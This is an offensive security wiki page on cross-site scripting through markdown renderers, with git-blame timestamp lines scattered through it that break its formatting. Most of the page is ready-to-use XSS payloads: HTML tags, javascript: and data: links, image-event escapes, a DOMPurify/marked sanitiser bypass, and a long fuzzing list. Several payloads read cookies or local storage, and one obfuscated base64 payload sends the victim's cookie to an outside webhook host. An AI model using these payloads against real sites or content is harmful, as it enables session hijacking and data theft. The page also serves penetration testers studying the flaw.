2022-05-05 23:53:10 +00:00
# XSS in Markdown
2024-07-18 23:15:55 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-10-11 12:43:12 +00:00
< details >
2024-07-18 23:15:55 +00:00
< summary > Support HackTricks< / summary >
2022-10-11 12:43:12 +00:00
2024-07-18 23:15:55 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-10-11 12:43:12 +00:00
< / details >
2024-07-18 23:15:55 +00:00
{% endhint %}
2022-10-11 12:43:12 +00:00
2022-05-05 23:53:10 +00:00
If you have the chance to inject code in markdown, there are a few options you can use to trigger a XSS when the code gets interpreted.
### HTML tags
The most common way to get XSS in markdown is to inject common HTML tags that execute javascript, because several makdown interpreters will also accept HTML
```html
<!-- XSS with regular tags -->
< script > alert ( 1 ) < / script >
< img src = x onerror = alert(1) / >
```
You can find more examples in the [main XSS page of hacktricks ](./ ).
### Javascript links
If HTML tags aren't an option you could always try to play with markdown syntax:
```html
<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a ](javascript:prompt(document.cookie ))
<!-- Other links attacks with some bypasses -->
[Basic ](javascript:alert('Basic' ))
[Local Storage ](javascript:alert(JSON.stringify(localStorage )))
[CaseInsensitive ](JaVaScRiPt:alert('CaseInsensitive' ))
[URL ](javascript://www.google.com%0Aalert('URL' ))
[In Quotes ]('javascript:alert("InQuotes" )')
[a ](j a v a s c r i p t:prompt(document.cookie ))
[a ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )
[a ](javascript:window.onerror=alert;throw%201 )
```
### Img event syntax abuse
```markdown
![Uh oh... ]("onerror="alert('XSS' ))
![Uh oh... ](https://www.example.com/image.png"onload="alert('XSS' ))
![Escape SRC - onload ](https://www.example.com/image.png"onload="alert('ImageOnLoad' ))
![Escape SRC - onerror ]("onerror="alert('ImageOnError' ))
```
### HTML Sanitiser Markdown Bypass
The following code is **sanitising HTML input** and then **passing it to the markdown parser** , then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify 
```html
2024-02-07 04:05:50 +00:00
<!-- from https://infosecwriteups.com/clique - writeup - %C3%A5ngstromctf - 2022 - e7ae871eaa0e -->
2022-05-05 23:53:10 +00:00
< script src = "https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js" > < / script >
< script src = "https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js" > < / script >
< script >
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
< / script >
```
Payloads example:
```html
< div id = "1
![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
< a title = "a
< img src = x onerror = alert(1) > ">yep< / a >
------------------------------------------------
[x ](y '<style>' )<!--</style><div id="x--> < img src = 1 onerror = alert(1) > "></ div >
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))> ](#'></p> )
----------------------------------------------
2022-05-18 23:05:43 +00:00
`<p x="` < img src = x onerror = alert(1) > "></ p >
2022-05-05 23:53:10 +00:00
```
### Fuzzing
```html
<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->
[a ](javascript:prompt(document.cookie ))
[a ](j a v a s c r i p t:prompt(document.cookie ))
![a ](javascript:prompt(document.cookie ))\
< javascript:prompt ( document . cookie ) >
< & #x6A& #x61& #x76& #x61& #x73& #x63& #x72& #x69& #x70& #x74& #x3A& #x61& #x6C& #x65& #x72& #x74& #x28& #x27& #x58& #x53& #x53& #x27& #x29>
![a ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )\
[a ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )
[a ](javascript:alert('XSS') )
![a'"`onerror=prompt(document.cookie) ](x )\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious ](javascript:window.onerror=alert;throw%20document.cookie )
[test ](javascript://%0d%0aprompt(1 ))
[test ](javascript://%0d%0aprompt(1 );com)
[notmalicious ](javascript:window.onerror=alert;throw%20document.cookie )
[notmalicious ](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie )
[a ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )
[clickme ](vbscript:alert(document.domain ))
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
< http: // \<meta \ http-equiv = \"refresh \"\ content= \"0; \ url=http://danlec.com/ \"\>>
[text ](http://danlec.com " [@danlec](/danlec ) ")
[a ](javascript:this;alert(1 ))
[a ](javascript:this;alert(1) )
[a ](javascript:this;alert(1) )
[a ](Javascript:alert(1) )
[a ](Javas%26%2399;ript:alert(1) )
[a ](javascript:alert(1) )
[a ](javascript:confirm(1 )
[a ](javascript://www.google.com%0Aprompt(1 ))
[a ](javascript://%0d%0aconfirm(1 );com)
[a ](javascript:window.onerror=confirm;throw%201 )
[a ]( javascript:alert(document.domain) )
[a ](javascript://www.google.com%0Aalert(1 ))
[a ]('javascript:alert("1" )')
[a ](JaVaScRiPt:alert(1 ))
![a ](https://www.google.com/image.png"onload="alert(1 ))
![a ]("onerror="alert(1 ))
< /http://< ?php\>< \h1 \>< script:script > confirm(2)
[XSS ](.alert(1 );)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]] )
[ ](http://a?p=[[/onclick=alert(0 ) .]])
[a ](javascript:new%20Function`al\ert\`1\``; )
[XSS ](javascript:prompt(document.cookie ))
[XSS ](j a v a s c r i p t:prompt(document.cookie ))
[XSS ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )
[XSS ](javascript:alert('XSS') )
[XSS]: (javascript:prompt(document.cookie))
[XSS ](javascript:window.onerror=alert;throw%20document.cookie )
[XSS ](javascript://%0d%0aprompt(1 ))
[XSS ](javascript://%0d%0aprompt(1 );com)
[XSS ](javascript:window.onerror=alert;throw%20document.cookie )
[XSS ](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie )
[XSS ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )
[XSS ](vbscript:alert(document.domain ))
[XSS ](javascript:this;alert(1 ))
[XSS ](javascript:this;alert(1) )
[XSS ](javascript:this;alert(1) )
[XSS ](Javascript:alert(1) )
[XSS ](Javas%26%2399;ript:alert(1) )
[XSS ](javascript:alert(1) )
[XSS ](javascript:confirm(1 )
[XSS ](javascript://www.google.com%0Aprompt(1 ))
[XSS ](javascript://%0d%0aconfirm(1 );com)
[XSS ](javascript:window.onerror=confirm;throw%201 )
[XSS ](<EFBFBD> javascript:alert(document.domain) )
![XSS ](javascript:prompt(document.cookie ))\
![XSS ](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K )\
![XSS'"`onerror=prompt(document.cookie) ](x )\
```
2022-10-11 12:43:12 +00:00
2024-07-18 23:15:55 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-10-11 12:43:12 +00:00
< details >
2024-07-18 23:15:55 +00:00
< summary > Support HackTricks< / summary >
2022-10-11 12:43:12 +00:00
2024-07-18 23:15:55 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-10-11 12:43:12 +00:00
< / details >
2024-07-18 23:15:55 +00:00
{% endhint %}